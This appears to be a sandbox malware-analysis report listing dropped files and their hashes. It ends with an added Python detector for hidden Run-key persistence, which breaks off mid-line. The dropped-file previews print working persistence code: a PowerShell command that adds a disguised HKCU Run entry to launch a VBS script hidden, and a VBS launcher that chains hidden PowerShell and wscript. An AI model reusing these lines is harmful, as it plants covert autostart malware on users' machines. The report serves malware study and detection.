                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                   (Six further dropped-file records follow that are identical in every field to the entry above: a 60-byte PowerShell AppLocker test file, MD5 D17FE0A3F47BE24A6453E9EF58C94641, written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. They are not repeated here.)
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):449448
                                  Entropy (8bit):3.340780405236786
                                  Encrypted:false
                                  SSDEEP:96:WDT/c7lY88ky0xbFi1msq4VIAGYAjrGzrD5UbF:W3/OlY88kyIhi1msLVIAGYAUvGF
                                  MD5:E260955361DC0C8454FCFA061A45F6F1
                                  SHA1:BB77B8E3EF1C8D30CB5DBB90725D34E3C7602E13
                                  SHA-256:E9CC243923DE94787673438F26C30BAEFE9995B38C8B8047B95726B998BAF26C
                                  SHA-512:2F6572ECF6169A33C4CD273C0A9D8FD158E4E9230BB3C0489F3CA8BD0884C784D2372DCC09A6438F178EC2E8A27CCD37B1DE3771B6A6CC6485D8D220BC3FA202
                                  Malicious:true
                                  Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):265
                                  Entropy (8bit):5.089796375501315
                                  Encrypted:false
                                  SSDEEP:6:9HUomDuwZH1j0IQHMCsny1xsAuwkn23fTflIcNBeR7n:9HUBVVj0YCsngzpfbflIc3O7n
                                  MD5:FC519A447E37C92CF0674A7C8C6463C7
                                  SHA1:E901EC598A0D20FFC3C0C519AAE2008EB1387A79
                                  SHA-256:4C41BA682C8AC4DEDC245FD9699E4E13D79C44298CCF01F90E615E7779D9F904
                                  SHA-512:294BADFCC831F4B6E5B9BC165606A03C90F605ECA74C0A22303C4DCE11323FB437A4A2721134FA3F87494A2A333CA6833A28828575EAF6D8B1D29DC7B7B8A380
                                  Malicious:true
                                  Preview:$teste = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "_______________________-------------" -Value "Powershell.exe -WindowStyle hidden ""& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' """ -PropertyType "String" -force; {$teste}
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):178
                                  Entropy (8bit):5.071665462776722
                                  Encrypted:false
                                  SSDEEP:3:jJi0m81GX0HsoduSJJFIf9IMwblAUR1ftLCIAut+kiE2J5xAIUuYLWoj5gWA:jJididMon81x87RBN3Auwkn23f18jCWA
                                  MD5:220F960E7D8D0FBD313F359A40BC5CD8
                                  SHA1:9277DF8E5D0E97DFA131B59146222FC7A95D8EA5
                                  SHA-256:214898F26129096B5771F772A10BA7D42A20F16A6C02CDF4DFE3EFA3C582E6DF
                                  SHA-512:C35E3C23EEDF35F227297C7206973B966F13DB87535B38AAB50007DC8C2E0E1EEC563B0661F8DAAAABCF08E3C1E70B51E8D71C272C0C3CFDCD7AACD09509C19C
                                  Malicious:true
                                  Preview:Set KaHuc = CreateObject("Wscript.shell")..KaHuc.run "powershell -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'" ,0, false
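The two dropped files above are the persistence chain: a Run-key value whose name is nothing but underscores and hyphens starts PowerShell hidden, PowerShell hands xx2.vbs to the script host, and xx2.vbs relaunches the original sostener.vbs through wscript.exe //b //nologo. The following is an added example (not part of the Joe Sandbox report and not code from the sample) that scores such autostart values and launcher command lines; RUN_NAME, RUN_VALUE and LAUNCHER_CMD are transcribed from the dropped files shown above, the OneDrive entry is a constructed control, and the point weights and threshold are assumptions.

```python
"""Score autostart (HKCU Run) values and launcher command lines for hidden
script-host persistence.

Added example, not part of the Joe Sandbox report and not code from the
sample. RUN_NAME/RUN_VALUE and LAUNCHER_CMD are transcribed from the two
dropped files in the report (the doubled quotes in the dropped .ps1 are
PowerShell escaping and are resolved here); BENIGN_* is a constructed
control entry. Point weights and the threshold are assumptions.
"""
import re
from dataclasses import dataclass, field

# Script hosts and LOLBins that seldom belong in a user's Run key.
SCRIPT_HOSTS = {"powershell.exe", "powershell", "pwsh.exe", "pwsh",
                "wscript.exe", "wscript", "cscript.exe", "cscript",
                "mshta.exe", "mshta"}

# Transcribed from the report's dropped files.
RUN_NAME = "_______________________-------------"
RUN_VALUE = ("Powershell.exe -WindowStyle hidden "
             "\"& 'C:\\Users\\user\\AppData\\Local\\Temp\\xx2.vbs' \"")
LAUNCHER_CMD = ("powershell -WindowStyle hidden -command wscript.exe //b //nologo "
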